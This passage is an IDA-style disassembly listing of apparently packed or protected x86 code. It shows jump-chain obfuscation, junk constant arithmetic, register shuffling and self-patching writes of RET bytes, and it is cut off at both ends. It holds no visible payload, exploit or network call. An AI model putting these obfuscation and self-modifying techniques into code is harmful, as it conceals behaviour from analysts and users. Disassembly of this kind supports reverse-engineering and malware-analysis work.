; START	OF FUNCTION CHUNK FOR sub_45833C

loc_44FC38:				; CODE XREF: sub_45833C-1033Cj
		ror	edx, 1Dh
; END OF FUNCTION CHUNK	FOR sub_45833C
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44FC3B:				; CODE XREF: sub_45833C:loc_43DF6Cj
					; sub_445226-58B5j ...
		jmp	loc_43C367
; ---------------------------------------------------------------------------

loc_44FC40:				; CODE XREF: sub_45833C+Aj
					; sub_445226+157E5j
		xchg	edi, [esp+10h+var_10]
		mov	ecx, edi
		pop	edi
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_44FC46:				; CODE XREF: sub_44B489-8D4Fj
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_44FC48:				; CODE XREF: sub_4480CB+99DDj
		jmp	loc_44C6BD
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44FC4D:				; CODE XREF: sub_4458DD+67A9j
		jmp	loc_444604
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_44FC52	proc near		; CODE XREF: sub_448D42+16j
					; sub_44FB21-1920p
		push	edi
		jmp	loc_4563AC
sub_44FC52	endp

; ---------------------------------------------------------------------------
		sub	ebx, 7C668624h
		cmp	edi, esi
		jmp	loc_459E82
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_44FC65:				; CODE XREF: sub_459789:loc_4508A3j
					; sub_459789-8ED8j
		and	edx, 0EBA2412Fh
		rol	edx, 0Ah
		add	edx, 784037D2h
		mov	edx, [edx]
		or	edx, edx
		jmp	loc_446C7C
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dw 0D2A6h
dword_44FC80	dd 6EFCE7h		; DATA XREF: y2kk37jd:00440CC0w
dword_44FC84	dd 77E75CB5h		; DATA XREF: sub_445DF5-4779r
					; sub_44B924-8921r ...
dword_44FC88	dd 2			; DATA XREF: sub_4492F7-C8F8r
					; sub_444DF4-2886r ...
		dd 3 dup(2), 0C0h, 40h,	2 dup(1), 4 dup(2), 0C0h, 40h
		dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
		dd 40h,	2 dup(1), 4 dup(2), 0C0h, 40h, 0
		dd 1, 4	dup(2),	0C0h, 40h, 0
		dd 1, 4	dup(2),	0C0h, 40h, 0
		dd 401h, 4 dup(2), 0C0h, 40h, 0
		dd 23h dup(1), 2 dup(2), 4 dup(0)
		dd 40h,	42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
		dd 42h,	2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
		dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
		dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
		dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
		dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
		dd 0A00h, 60h, 1A00h, 4	dup(1),	0
		dd 1, 2	dup(0)
		dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_450088:				; CODE XREF: sub_445787+8BCCj
		jmp	loc_44C60F
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------

loc_45008D:				; CODE XREF: y2kk37jd:004427A7j
		xor	edx, 70C446BDh
		or	edi, ebx
		add	ebx, edi
		jmp	loc_4582FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_45009C:				; CODE XREF: sub_43D41D+1BF3j
		jge	loc_44E793
; END OF FUNCTION CHUNK	FOR sub_43D41D
; START	OF FUNCTION CHUNK FOR sub_440337

loc_4500A2:				; CODE XREF: sub_440337+80D4j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_4500A7:				; CODE XREF: sub_447F91+7j
		jmp	loc_43EB90
; END OF FUNCTION CHUNK	FOR sub_447F91
; ---------------------------------------------------------------------------
		pop	ebx
		shr	edx, 1Fh
		jmp	loc_44E792
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B38

loc_4500B5:				; CODE XREF: sub_445B38+F635j
		popf
		jmp	loc_43D9DA
; END OF FUNCTION CHUNK	FOR sub_445B38
; ---------------------------------------------------------------------------
		shl	ecx, 19h
		jmp	sub_44704D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_4500C3:				; CODE XREF: sub_446E19+C646j
		or	esi, 17B6CD12h
		jle	loc_45B297
		jmp	loc_43D19C
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4500D4:				; CODE XREF: sub_442F9C:loc_44337Fj
					; sub_43ED19+13D02j
		xor	eax, 89868B96h
		jl	loc_44304A
		shl	ecx, 17h
		jmp	loc_449C82
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4500E8:				; CODE XREF: sub_445226+11B14j
		jnz	loc_45B61A

loc_4500EE:				; CODE XREF: sub_445226+90FBj
		jmp	loc_44CB23
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		sbb	ecx, 623107BCh
		mov	eax, ebp
		pushf
		jl	loc_44B173
		jmp	loc_45B61A
; ---------------------------------------------------------------------------

loc_450107:				; CODE XREF: y2kk37jd:00446B11j
		push	edi
		push	48205589h
		pop	edi
		and	edi, 0E4D9EA9Ch
		cmp	edi, 28075C74h
		jmp	loc_456E0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_45011F:				; CODE XREF: sub_44B03F:loc_442169j
		pop	eax
		xchg	ebx, [esp+0]
		mov	ebp, ebx
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_450127:				; CODE XREF: sub_44CF09+102Cj
		jnz	loc_43EB48
		jmp	loc_4490F0
; END OF FUNCTION CHUNK	FOR sub_44CF09
; ---------------------------------------------------------------------------

loc_450132:				; CODE XREF: y2kk37jd:0043D3A8j
		add	eax, 69FAD746h
		xor	edi, esi

loc_45013A:				; CODE XREF: y2kk37jd:loc_450954j
		mov	eax, [ebp-0Ch]
		call	sub_4434CD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_186. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Ch
		push	esi
		push	0BBBA1E9Bh
		pop	esi
		jmp	loc_443EDB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_450153:				; CODE XREF: sub_43F8B8:loc_4421ADj
		rol	eax, 0Eh
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0Ch+var_C]
		push	9B2BFE0Ah
		xchg	esi, [esp+0]
		jmp	loc_45A76D
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6BF

loc_450169:				; CODE XREF: sub_44D6BF+6BBj
		jnz	loc_450A9F
		jmp	loc_43C5EA
; END OF FUNCTION CHUNK	FOR sub_44D6BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E707

loc_450174:				; CODE XREF: sub_43E707+22j
		mov	byte ptr [eax],	0C3h
		jmp	loc_441AF3
; ---------------------------------------------------------------------------

loc_45017C:				; CODE XREF: sub_43E707+33EDj
		push	offset loc_44BA65
		jmp	loc_452F69
; END OF FUNCTION CHUNK	FOR sub_43E707
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_450186:				; CODE XREF: y2kk37jd:00440100j
					; sub_44001E:loc_45414Cj
		push	135CE846h
		pop	eax
		rol	eax, 0Eh
		jb	loc_44D52F

loc_450195:				; CODE XREF: y2kk37jd:0044CA1Cj
		jmp	loc_457EA3
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_44D52D
; ---------------------------------------------------------------------------
		jns	loc_441C58

; =============== S U B	R O U T	I N E =======================================



sub_4501A6	proc near		; CODE XREF: sub_43E0DE+96F5p
		xchg	edx, [esp+0]
		pop	edx
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
sub_4501A6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4501AF:				; CODE XREF: sub_4448E2:loc_457DA6j
		cmp	al, 0A4h
		jz	loc_452F6F
		jmp	loc_43F6F3
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_4501BC:				; CODE XREF: y2kk37jd:0044A39Bj
		mov	edi, edx
		xchg	edi, [esp]
		call	sub_446819
		mov	eax, 32FE4135h
		push	offset loc_44DDFC
		jmp	loc_43CDD4
; ---------------------------------------------------------------------------

loc_4501D5:				; CODE XREF: y2kk37jd:00441882j
		jnz	loc_44A814
		jmp	loc_4445FA
; ---------------------------------------------------------------------------
		xchg	edi, [esp]
		mov	edx, edi
		pop	edi
		call	sub_44FA88
		retn
; ---------------------------------------------------------------------------

loc_4501EC:				; CODE XREF: y2kk37jd:0043EBE2j
		jmp	loc_456D89
; ---------------------------------------------------------------------------

loc_4501F1:				; CODE XREF: y2kk37jd:00453C56j
		call	sub_44DAE1
		test	al, al
		jz	loc_44E189
		jmp	loc_45AD3C

; =============== S U B	R O U T	I N E =======================================



sub_450203	proc near		; CODE XREF: y2kk37jd:004446B3j
					; sub_446AC6+5p ...

arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043CC86 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D272 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A6E SIZE 00000019 BYTES

		xchg	edx, [esp+0]
		pop	edx

loc_450207:				; CODE XREF: y2kk37jd:0044B7F6j
		pop	ecx
		jns	loc_454A6E
		mov	eax, [esp+0]
		jmp	loc_43CC86
sub_450203	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_450216	proc near		; CODE XREF: sub_450AB0+1p
					; y2kk37jd:00452F0Fj
		xchg	ecx, [esp+0]
		pop	ecx
		push	4C91A0h
		push	0C3A128Ah
		pop	eax
		or	eax, 2FA93791h
		xor	eax, 13692EEDh
		add	eax, ebp
		jmp	loc_45BD64
sub_450216	endp


; =============== S U B	R O U T	I N E =======================================



sub_450238	proc near		; DATA XREF: sub_441222+3A37o
		mov	esp, ebp
		pop	ebp
		retn
sub_450238	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F61

loc_45023C:				; CODE XREF: sub_444F61+Ej
		jmp	loc_4584A8
; END OF FUNCTION CHUNK	FOR sub_444F61
; ---------------------------------------------------------------------------

loc_450241:				; CODE XREF: y2kk37jd:00441ED1j
		jmp	loc_444EED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_450246:				; CODE XREF: sub_457524-1BE5Bj
		jmp	loc_45B8BF
; END OF FUNCTION CHUNK	FOR sub_457524

; =============== S U B	R O U T	I N E =======================================



sub_45024B	proc near		; CODE XREF: sub_444EDE+4p
					; sub_4425BE+484Cp ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043F472 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00443BDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004443E3 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00448A19 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E495 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450EE9 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00455EDD SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0045A015 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AA64 SIZE 00000020 BYTES

		jns	sub_45593D
		push	ebp
		jmp	loc_450262
; ---------------------------------------------------------------------------

locret_450257:				; CODE XREF: sub_43C638+1559Cj
		retn
; ---------------------------------------------------------------------------

loc_450258:				; CODE XREF: sub_4540F2+854Ej
		jmp	loc_450EE9
; ---------------------------------------------------------------------------

loc_45025D:				; CODE XREF: sub_448A12+9132j
		jmp	loc_455EDD
; ---------------------------------------------------------------------------

loc_450262:				; CODE XREF: sub_45024B+7j
		jmp	loc_4443E3
sub_45024B	endp

; ---------------------------------------------------------------------------

loc_450267:				; CODE XREF: y2kk37jd:0043CFDEj
		add	ebp, eax
; START	OF FUNCTION CHUNK FOR sub_43E049

loc_450269:				; CODE XREF: sub_43E049:loc_43CFC8j
		xor	ecx, 0CFD556E8h
		sub	ecx, 8A6114DBh
		and	ecx, 0F982AD62h
		jmp	loc_447CB7
; END OF FUNCTION CHUNK	FOR sub_43E049
; ---------------------------------------------------------------------------

loc_450280:				; CODE XREF: y2kk37jd:loc_4536BAj
		jz	loc_43F7E1
		jmp	loc_4516BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6E

loc_45028B:				; CODE XREF: sub_446B6E:loc_440882j
		mov	ebx, edx
		xchg	ebx, [esp+0]
		call	sub_4448E2
		mov	eax, 9E471775h
		call	sub_442C3E
		mov	ds:off_41E0B4, eax
		lea	eax, sub_446B6E
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F1FC
; END OF FUNCTION CHUNK	FOR sub_446B6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443688

loc_4502B3:				; CODE XREF: sub_443688:loc_43BFCCj
		pop	eax
		cmp	dword ptr [eax], 0
		jnz	loc_453CF5
		jmp	sub_443688
; END OF FUNCTION CHUNK	FOR sub_443688

; =============== S U B	R O U T	I N E =======================================



sub_4502C2	proc near		; CODE XREF: sub_443688-AAAp
					; sub_443688+10676p ...

; FUNCTION CHUNK AT 0044F778 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004523EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456216 SIZE 0000001A BYTES

		jnz	sub_45623A
		push	ebp
		jmp	loc_44F778
sub_4502C2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	eax, 269D266Ch
		adc	edx, eax
		jmp	loc_44846E
; ---------------------------------------------------------------------------

loc_4502DB:				; CODE XREF: y2kk37jd:loc_4534C2j
		jnz	loc_45B549
		jmp	loc_43EA56

; =============== S U B	R O U T	I N E =======================================



sub_4502E6	proc near		; CODE XREF: y2kk37jd:00448067j
					; sub_440337+1602Dp

; FUNCTION CHUNK AT 0044C206 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00457F97 SIZE 00000015 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	0F961578Eh
		pop	edx
		or	edx, 0ABF61538h
		and	edx, 7FEE0AE9h
		sub	edx, ds:4000F3h
		or	edx, 9BA49A53h
		jmp	loc_457F97
sub_4502E6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45030D:				; CODE XREF: y2kk37jd:loc_454E58j
		push	edx
		push	edx
		push	4352CE63h
		pop	edx
		and	edx, 0C140BA52h
		rol	edx, 1Bh
		xor	edx, 2744D46Dh
		jmp	loc_443D32
; ---------------------------------------------------------------------------
		sbb	ebp, 0D884319h
		jmp	sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_450334:				; CODE XREF: sub_4448E2:loc_456766j
		push	0F58EB968h
		pop	edi
		sub	edi, 1DCB6DA7h
		xor	edi, 370DEBD5h
		rol	edi, 1Fh
		sub	edi, 0A84F9AF9h
		xor	edi, 4F1D8566h
		sub	eax, edi
		jmp	loc_444F03
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		sbb	edi, esi
		jmp	sub_45986D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA43

loc_450363:				; CODE XREF: sub_456A36:loc_456EFDj
					; sub_43DA43+1C192j
		sub	edi, 236CE648h
		cmp	edi, 63CF5F62h
		jmp	loc_45785A
; END OF FUNCTION CHUNK	FOR sub_43DA43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_450374:				; CODE XREF: sub_44B03F-D59Dj
		jz	loc_445B62
		jmp	loc_44DBE7
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4521FC

loc_45037F:				; CODE XREF: sub_4521FC:loc_43B3B9j
		push	eax
		pop	ebp
		xchg	ebp, [esp+0]
		push	offset loc_44F93D
		jmp	nullsub_123
; END OF FUNCTION CHUNK	FOR sub_4521FC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_258. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_45038F:				; CODE XREF: sub_4447EA+279Bj
		jmp	loc_449CBB
; END OF FUNCTION CHUNK	FOR sub_4447EA

; =============== S U B	R O U T	I N E =======================================



sub_450394	proc near		; DATA XREF: y2kk37jd:004550EDo

; FUNCTION CHUNK AT 00454AB3 SIZE 00000005 BYTES

		call	sub_43C7B9
		mov	eax, [ebp-80Ch]
		push	ebx
		mov	ebx, eax
		jmp	loc_454AB3
sub_450394	endp

; ---------------------------------------------------------------------------

loc_4503A7:				; CODE XREF: y2kk37jd:loc_44CE4Aj
		add	esi, 0EB3A53E9h
		xchg	esi, [esp]
		jmp	nullsub_455
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4503B5:				; CODE XREF: sub_445226+15F0Aj
		add	eax, ebp
		add	eax, 0BB5319E3h
		mov	eax, [eax]
		push	eax
		call	sub_458FC0
		test	eax, eax
		jz	loc_458441
		jmp	loc_441F97
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_4503D2:				; CODE XREF: sub_44DC38-7C96j
		mov	edx, ebp
		pop	ebp
		xchg	ebp, [esp+0]
		mov	eax, ebp
		pop	ebp
		pop	ebp
		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_44DC38
; ---------------------------------------------------------------------------

loc_4503E1:				; CODE XREF: y2kk37jd:0045544Aj
		jns	loc_44F184
		test	ebx, 3879ADA4h
		jmp	loc_450FF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4503F2:				; CODE XREF: sub_445226+6DBBj
		jl	loc_448CF1

loc_4503F8:				; CODE XREF: sub_445226:loc_4453C6j
		call	nullsub_16
		retn
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4503FE:				; CODE XREF: sub_45B7AA+47j
		jmp	locret_44129B
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_450404:				; CODE XREF: sub_45689F:loc_44566Bj
		jns	loc_4437C1

loc_45040A:				; CODE XREF: sub_44EE3D-1F39j
		jmp	loc_45B1A1
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_45040F:				; CODE XREF: sub_443BAF+1Ej
		jmp	loc_444BDA
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
		push	4A4714F8h
		shr	ebp, 0Fh
		cdq
		popf
		add	ebp, edi
		jmp	loc_4437C1
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_450426:				; CODE XREF: sub_444E83+8E97j
		jmp	loc_45489C
; END OF FUNCTION CHUNK	FOR sub_444E83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2CD

loc_45042B:				; CODE XREF: sub_44C2CD+8j
		jmp	nullsub_467
; END OF FUNCTION CHUNK	FOR sub_44C2CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_450430:				; CODE XREF: sub_444899-8CAFj
					; sub_44DBF8:loc_450604j
		jmp	loc_440A1A
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C5CF

loc_450435:				; CODE XREF: sub_45C5CF+Dj
		ror	eax, 1Ah
; END OF FUNCTION CHUNK	FOR sub_45C5CF
; START	OF FUNCTION CHUNK FOR sub_445568

loc_450438:				; CODE XREF: sub_445568:loc_43B7AAj
		push	eax
		mov	eax, edi

loc_45043B:				; CODE XREF: sub_4411C3+1160Bj
		xchg	eax, [esp+4+var_4]
		push	1730B993h
		pop	edi
		xor	edi, 462F7936h
		jmp	loc_43EAE7
; END OF FUNCTION CHUNK	FOR sub_445568
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_153. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_450450:				; CODE XREF: sub_43BD0D:loc_43DE77j
		jnz	loc_45B39E

loc_450456:				; CODE XREF: y2kk37jd:00443CC5j
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
		or	esi, 0FE72E7B3h

loc_450461:				; CODE XREF: y2kk37jd:loc_43B0B9j
		popf
		pushf
		jmp	loc_45B39E
; ---------------------------------------------------------------------------
		xchg	ebx, [edi]
		jmp	sub_447407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45046F:				; CODE XREF: sub_43ED19+3804j
					; sub_457524-B177j
		push	8873D34Ah
		pop	edi
		xor	edi, 0C0756A75h
		add	edi, 0B83EC0DCh
		xchg	edi, [esp-4+arg_0]
		jmp	loc_454DD7
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_450489	proc near		; CODE XREF: y2kk37jd:0043DE30j
					; y2kk37jd:00451E64p
		xchg	edx, [esp+0]
		pop	edx
		push	ebp
		mov	ebp, ebx
		jmp	loc_4497F9
sub_450489	endp

; ---------------------------------------------------------------------------
		push	edi
		push	8CD2BD14h
		pop	edi
		or	edi, 0F945AE36h
		rol	edi, 6
		jmp	loc_4525A4
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_445F41
		jmp	loc_45A040
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_4504B7:				; CODE XREF: sub_454539+10j
		call	sub_444693
; END OF FUNCTION CHUNK	FOR sub_454539

; =============== S U B	R O U T	I N E =======================================



sub_4504BC	proc near		; CODE XREF: sub_4458DD:loc_448AD8p
					; y2kk37jd:00457BF4j

; FUNCTION CHUNK AT 00440577 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044110B SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	4381EAEh
		pop	edx
		and	edx, 0ABF3A63Eh
		xor	edx, 0EFCF414Ah
		jmp	loc_44110B
sub_4504BC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4504D7:				; CODE XREF: y2kk37jd:00441721j
		or	ebx, 11593F8h

; =============== S U B	R O U T	I N E =======================================



sub_4504DD	proc near		; CODE XREF: sub_44B489+5p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D93E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DFDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F9A4 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00441E2D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004424AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004427B6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00449107 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00457B27 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00458AD8 SIZE 0000001A BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_455BE9
		push	19CD2950h
		pop	eax
		jmp	loc_43DFDA
sub_4504DD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF1D

loc_4504F1:				; CODE XREF: sub_44DF1D:loc_453F3Ej
		call	sub_442717

loc_4504F6:				; CODE XREF: sub_443695+FA3Ej
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44DF1D

; =============== S U B	R O U T	I N E =======================================



sub_4504FB	proc near		; DATA XREF: y2kk37jd:00456159o
		add	edx, 9650A2B2h
		mov	edx, [edx]
		call	sub_45B491
sub_4504FB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44FA95

loc_450508:				; CODE XREF: sub_44FA95+Bj
		jmp	loc_45A8F3
; END OF FUNCTION CHUNK	FOR sub_44FA95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA7F

loc_45050D:				; CODE XREF: sub_43DA7F+Bj
		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_43DA7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444825

loc_450512:				; CODE XREF: sub_444825+Fj
		jnz	loc_440D0F
		jmp	loc_448B45
; END OF FUNCTION CHUNK	FOR sub_444825
; ---------------------------------------------------------------------------

loc_45051D:				; CODE XREF: y2kk37jd:00448E07j
		xchg	ecx, [esp]
		mov	ebp, ecx
		pop	ecx
		push	eax
		jmp	loc_43DD75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_450529:				; CODE XREF: sub_44C304:loc_45781Bj
		jge	loc_43D48C
		push	0FC47FAC5h
		jb	loc_4586CC
		shr	edx, 1
		jmp	loc_43D48C
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4450D1

loc_450541:				; CODE XREF: sub_4450D1+C506j
		push	edx
		call	sub_44461D
		mov	eax, 729645CDh
		push	edi
		push	7EDB29CEh
		pop	edi
		xor	edi, 9450CE09h
		sub	edi, ds:4000F2h
		jmp	loc_4537D8
; END OF FUNCTION CHUNK	FOR sub_4450D1
; ---------------------------------------------------------------------------
		xor	eax, 75A0713Fh
		ror	ecx, 1Fh
		jmp	sub_43DA7F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_450573:				; CODE XREF: y2kk37jd:00442850j
		jmp	loc_43F0F8
; ---------------------------------------------------------------------------

loc_450578:				; DATA XREF: sub_45484D:loc_43C839o
		cmp	dword ptr [ebp-14h], 4
		jnz	loc_44F7BC
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 4
		mov	eax, [ebp-4]
		movzx	eax, byte ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45058F:				; CODE XREF: sub_453867+6C55j
		jmp	loc_43E8FB
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_450594:				; DATA XREF: sub_445E03+Eo
		or	eax, eax
		jnz	loc_43EA99
		jmp	loc_44CD57

; =============== S U B	R O U T	I N E =======================================



sub_4505A1	proc near		; CODE XREF: sub_445CC9+1p
					; y2kk37jd:0044938Bj
		xchg	ebx, [esp+0]
		pop	ebx
		push	2BF2EB74h
		pop	ebx
		rol	ebx, 2
		xor	ebx, 0AFCBADD7h
		popf
		jmp	loc_43E004
sub_4505A1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F42

loc_4505BA:				; CODE XREF: sub_442F42:loc_43C182j
		jz	loc_44920E
		jmp	loc_43DD82
; END OF FUNCTION CHUNK	FOR sub_442F42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4505C5:				; CODE XREF: sub_4448E2+10AA2j
		or	ebp, 34E71FE7h
		jmp	loc_4511CB
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

locret_4505D0:				; CODE XREF: y2kk37jd:00443EFAj
		retn
; ---------------------------------------------------------------------------

loc_4505D1:				; CODE XREF: y2kk37jd:0043EFB8j
		jmp	loc_43DC30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_4505D6:				; CODE XREF: sub_456809-196A3j
		jmp	loc_44A723
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_4505DB:				; CODE XREF: y2kk37jd:loc_458E89j
		jz	loc_441FA1
		jmp	loc_45359F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2F9

loc_4505E6:				; CODE XREF: sub_45A2F9+9E1j
